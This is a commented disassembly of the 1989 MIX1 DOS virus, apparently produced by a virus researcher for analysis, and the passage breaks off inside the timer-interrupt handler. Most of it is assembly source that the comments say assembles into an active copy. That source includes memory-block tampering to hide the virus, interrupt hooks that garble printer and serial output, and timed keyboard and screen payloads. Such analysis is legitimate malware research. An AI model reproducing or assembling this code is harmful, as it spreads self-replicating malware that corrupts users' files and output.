; THE MIX1 virus
;
; It was first detected in Israel in August '89.
;
; Disassembly done Sept. 24-25 '89.
;
; The author of this program is unknown, but it is clearly a
; modification of the "Icelandic" virus, with considerable
; additions
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much.
;
; A short description of the virus:
;
; It only infects .EXE files. Infected files grow by ... to ... bytes.
; The virus attaches itself to the end of the programs it infects.
;
; When an infected file is run, the virus copies itself to top of
; free memory, and modifies the memory blocks, in order to hide from
; memory mapping programs. Some programs may overwrite this area,
; causing the computer to crash.
;
; The virus will hook INT 21H and when function 4B (EXEC) is called
; it sometimes will infect the program being run. It will check every
; tenth program that is run for infection, and if it is not already
; infected, it will be.
;
; The virus will remove the Read-Only attribute before trying to
; infect programs.
;
; Infected files can be easily recognized, since they always end in
; "MIX1"
;
; To check for system infection, a byte at 0000:033Ch is used - if it
; contains 77h the virus is installed in memory (see the CMP at the start of
; ABRAX; the address lies inside the interrupt vector table).
;
;
VIRSIZ EQU 128
;
; This is the original program, just used so this file, when
; assembled, will produce an active copy.
;
_TEXT1 SEGMENT PARA PUBLIC
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
CODE SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,SS:NOTHING,ES:NOTHING
;
; The virus is basically divided in the following parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 17 handler. All outgoing characters will be garbled.
;
; 3. The new INT 14 handler. All outgoing characters will be garbled.
;
; 4. The new INT 8 handler. Counts timer ticks and raises the MIN50/MIN60
; flags 50 and 60 minutes after an infected program was run (see NEW8).
;
; 5. The new INT 9 handler. Forces the BIOS shift-state byte (0040:0017)
; to Num-Lock on / Caps-Lock off and clears the Alt flag for one key
; combination (see NEW9).
;
; 6. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
; Parts 1 and 6 are almost identical to the Icelandic-1 version
;
; This is a fake MCB. It sits at offset 0 of the virus image, is copied
; together with the code to the carved-off block at the top of memory (see
; L1 in the main routine) and becomes the real MCB of that block.
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
VIRUS PROC FAR
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
ABRAX: DEC SP ; This used to be SUB SP,4
DEC SP
NOP
DEC SP
DEC SP
PUSH BP
MOV BP,SP
NOP ; added
PUSH AX
NOP ; added
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
MOV AX,0 ; Was: XOR AX,AX
MOV ES,AX
CMP ES:[33CH],BYTE PTR 077H
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
L1: MOV AH,52H
INT 21H
MOV AX,ES:[BX-2]
MOV ES,AX
PUSH ES ; Two totally unnecessary instructions
POP AX ; added
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
PUSH BX ; Unnecessary addition
POP AX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block.
;
PUSH BX ; Was: MOV ES,BX
POP ES
MOV SI,0 ; Was: XOR SI,SI XOR DI,DI
MOV DI,SI
PUSH CS
POP DS
MOV CX,652H
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L3
PUSH AX
RET
;
; Zero some variables
;
L3: MOV BYTE PTR CS:[MIN60],0
NOP
MOV BYTE PTR CS:[MIN50],0
NOP
MOV WORD PTR CS:[TIMER],0
;
; The most nutty way to zero ES register that I have ever seen:
;
MOV BX,0FFFFH
ADD BX,3F3FH
MOV CL,0AH
SHL BX,CL
AND BX,CS:[CONST0]
MOV AX,BX
MOV ES,AX
;
; Set flag to confirm installation
;
MOV BYTE PTR ES:[33CH],77H
;
; Hook interrupt 21:
;
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
;
; Hook interrupt 17:
;
MOV AX,ES:[005CH]
MOV CS:[OLD17],AX
MOV AX,ES:[005EH]
MOV CS:[OLD17+2],AX
MOV AX,CS
MOV ES:[005EH],AX
MOV AX,OFFSET NEW17
MOV ES:[005CH],AX
;
; Hook interrupt 14:
;
MOV AX,ES:[0050H]
MOV CS:[OLD17],AX
MOV AX,ES:[0052H]
MOV CS:[OLD14+2],AX
MOV AX,CS
MOV ES:[0052H],AX
MOV AX,OFFSET NEW14
MOV ES:[0050H],AX
;
;
;
CMP WORD PTR CS:[NOINF],5
JG HOOK9
JMP EXIT
;
; Hook interrupt 9
;
HOOK9: MOV AX,ES:[0024H]
MOV CS:[OLD9],AX
MOV AX,ES:[0026H]
MOV CS:[OLD9+2],AX
MOV AX,CS
MOV ES:[0026H],AX
MOV AX,OFFSET NEW9
MOV ES:[0024H],AX
;
; Hook interrupt 8
;
MOV AX,ES:[0020H]
MOV CS:[OLD8],AX
MOV AX,ES:[0022H]
MOV CS:[OLD8+2],AX
MOV AX,CS
MOV ES:[0022H],AX
MOV AX,OFFSET NEW8
MOV ES:[0020H],AX
JMP EXIT
;
; Video processing
;
VID: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH DS
PUSH ES
PUSH CS
POP DS
MOV AH,0FH
INT 10H
MOV AH,6
MUL AH
MOV BX,AX
MOV AX,DS:[BX+OFFSET VIDEOT]
MOV CX,DS:[BX+OFFSET VIDEOT+2]
MOV DX,DS:[BX+OFFSET VIDEOT+4]
MOV ES,DX
SHR CX,1
MOV
DI,1
CMP AX,0
JNZ V1
V0: INC WORD PTR ES:[DI]
INC DI
INC DI
LOOP V0
JMP SHORT V2
NOP
V1: NOT WORD PTR ES:[DI]
INC DI
INC DI
LOOP V1
V2: POP ES
POP DS
POP DI
POP DX
POP CX
POP BX
POP AX
RET
;
; INT 9 replacement: Just fiddle around with the NUM-LOCK etc.
; This routine does not become active until 50 minutes after
; the execution of an infected program.
;
NEW9: PUSH AX
PUSH ES
CMP BYTE PTR CS:[MIN50],1
JNZ RETX1
XOR AX,AX
MOV ES,AX ; was xxxxxxxx
AND BYTE PTR ES:[417H],0BFH ; x0xxxxxx
OR BYTE PTR ES:[417H],20H ; x01xxxxx
TEST BYTE PTR ES:[417H],0CH
JZ RETX1
IN AL,60
CMP AL,53
JNZ RETX1
AND BYTE PTR ES:[417H],0F7H
;
; This seems to be an error - the virus uses a FAR call, which will
; probably cause the computer to crash.
;
DB 9AH
DW OFFSET VID,171CH
;
; This needs more checking.
;
RETX1: POP ES
POP AX
DB 0EAH
OLD9 DW 0,0
;
; New INT 14 routine - garble all outgoing characters
;
NEW14: CMP AH,1
JZ S1
DO14: DB 0EAH
OLD14 DW 0,0
S1: PUSH BX
XOR BX,BX
MOV BL,AL
ADD BX,OFFSET ERRTAB
MOV AL,CS:[BX] ; use old character as index into table
POP BX
JMP DO14
;
; New INT 8 routine
;
NEW8: PUSH DX
PUSH CX
PUSH BX
PUSH AX
CMP BYTE PTR CS:[MIN60],01 ; If counter >= 60 min.
JZ TT0 ; No need to check any more
INC WORD PTR CS:[TIMER] ; else increment timer
CMP WORD PTR CS:[TIMER],-10 ; 60 minutes ?
JZ TT1
CMP WORD PTR CS:[TIMER],54600 ; 50 minutes ?
JZ TT2
JMP TXEX
;
; 50 minutes after an infected program is run the flag is set.
;
TT2: MOV BYTE PTR CS:[MIN50],1
NOP
JMP TXEX
;
; 60 minutes after an infected program is run we start the ball bouncing.
;
TT1: MOV BYTE PTR CS:[MIN60],1
;
; Get current cursor position and save it
;
MOV AH,3
MOV BH,0
INT 10H
MOV CS:[SCRLINE],DH
MOV CS:[SCRCOL],DL
;
; Set cursor position
;
MOV AH,2
MOV BH,0
MOV DH,CS:[MYLINE]
MOV DL,CS:[MYCOL]
INT 10H
;
; Check what is there and store it
;
MOV AH,8
MOV BH,0
INT 10H
MOV CS:[ONSCREEN],AL
;
; Set cursor position back as it was before
;
MOV AH,2
MOV BH,0
MOV DH,CS:[SCRLINE]
MOV DL,CS:[SCRCOL]
INT 10H
;